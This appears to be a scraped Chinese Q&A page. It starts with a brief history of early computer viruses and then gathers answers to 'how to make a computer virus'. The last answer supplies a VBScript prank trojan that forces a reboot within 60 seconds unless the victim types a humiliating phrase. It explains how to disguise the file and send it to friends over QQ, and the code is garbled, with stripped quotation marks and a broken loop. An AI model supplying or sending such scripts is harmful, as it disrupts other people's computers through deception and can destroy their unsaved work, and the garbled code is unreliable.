4、世界上公認的第一個在個人電腦上廣泛流行的病毒是1986年初誕生的大腦(C-Brain)病毒，編寫該病毒的是一對巴基斯坦兄弟，兩兄弟經營著一家電腦公司，以出售自己編制的電腦軟體為生。當時，由於當地盜版軟體猖獗，為了防止軟體被任意非法拷貝，也為了追蹤到底有多少人在非法使用他們的軟體，於是在1986年年初，他們編寫了「大腦（Brain）」病毒，又被稱為「巴基斯坦」病毒。該病毒運行在DOS操作系統下，通過軟盤傳播，只在盜拷軟體時才發作，發作時將盜拷者的硬碟剩餘空間吃掉。
5、1988年11月美國國防部的軍用計算機網路遭受莫里斯病毒襲擊，致使美國Internet網路上6000多計算機感染，直接經濟損失9600萬美元。莫里斯病毒是由康乃爾大學23歲的羅特?莫里斯製作。後來出現的各類蠕蟲，都是仿造了莫里斯蠕蟲，以至於人們將該病毒的編制者莫里斯稱為「蠕蟲之父」。
6、1999年 Happy99、美麗殺手（Melissa）等完全通過Internet傳播的病毒的出現標志著Internet病毒將成為病毒新的增長點。其特點就是利用Internet的優勢，快速進行大規模的傳播，從而使病毒在極短的時間內遍布全球。
7、CIH病毒是繼DOS病毒的第四類新型病毒，CIH這三個字母曾......>>

問題七：怎麼製作電腦病毒？ 你懂編程么？！ 你會C VC++ JAVA VB 等一些編匯語言么 不會的話空喊個什麼啊 別老想著搞人家電腦 先看你自己電腦被搞了沒有

問題八：怎麼製作電腦病毒。 製造病毒也會感染自己電腦，你可以裝pe系統，在裡面自己研究，你可以去華盟網看看

問題九：怎麼樣製作簡單的電腦病毒 學習簡單的編程知識就可以，到網路搜索一些簡單編寫病毒的知識，然後學習編寫，在自己電腦上試驗。然後再逐步加深，學習深一些的編程語言，編寫難度大的病毒。但一定不要用病毒維護別人。

問題十：怎麼製作電腦病毒 方法如下：在開始內點擊運行輸入at xx:xx shutdown -s,xx：xx代表幾點幾分是在幾點幾分關機輸入shutdown.exe -s -t xx,xx代表多少秒鍾後關機 如果要取消，就輸入shutdown -a就可以取消了.
我聽一個朋友說，有個人給他發個東西。他看了下。。說要輸入一句話。。不然就管你機。是怎麼編的。。。我知道關機命令和取消命令。。。不知道要對方怎麼輸才可以取消命令。。
腳本，例如下面的東西。就可以實現。
1。
首先呢,我們在桌面創建個新文件夾然後打開,在上面找到-工具T-文件夾選項O-查看
把隱藏已知文件類型的擴展名前面的勾去掉.
然後我們開始製作.在桌面建立個記事本,然後把下面代碼復制進去
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject(wscript.shell)
WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 說我是豬，不說我是豬就一分鍾關你機，不信，你試試・・・ ,0 ,true
dim a
do while(a 我是豬)
a = inputbox (說我是豬,就不關機，快撒，說 我是豬,說不說,不說,8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox
loop
msgbox chr(13) + chr(13) + chr(13) + 早說就行了嘛,呵呵，豬
dim WSHshell
set WSHshell = wscript.createobject(wscript.shell)
WSHshell.run cmd.exe /c shutdown -a,0 ,true
msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈，真過癮
復制之後呢,把後綴修改為.vbs或者改變打開方式為應用程序，這樣你再壓縮下用QQ發給你朋友，對方打
開了就在60秒內要關閉計算機，
結素任務都不行，他只能說他是豬才能解決問題。夠壞吧？ 注意哦，你可以把我是豬那個修改成任
意想說的話，要是對付你喜歡的人，
就修改成 我愛你 這樣他只有說我愛你之後才不關閉計算機哦 也可以把時間修改為20 就是說打
開了20秒就關了,還沒等對方打完就關機了 是不是叫對方很郁悶呢?
第2招編寫VBS腳本
首先你可以看下面的
WScript.Echo(嘿，謝謝你打開我哦，我等你很久拉！&TSName)
WScript.Echo(你是可愛的小朋嗎?)
WScript.Echo(哈,我想你拉，這你都不知道嗎？)
WScript.Echo(怎麼才來，說~是不是不關心我)
WScript.Echo(哼,我生氣拉，等你這么久，心都涼啦。)
WScript.Echo(小強很生氣，......>>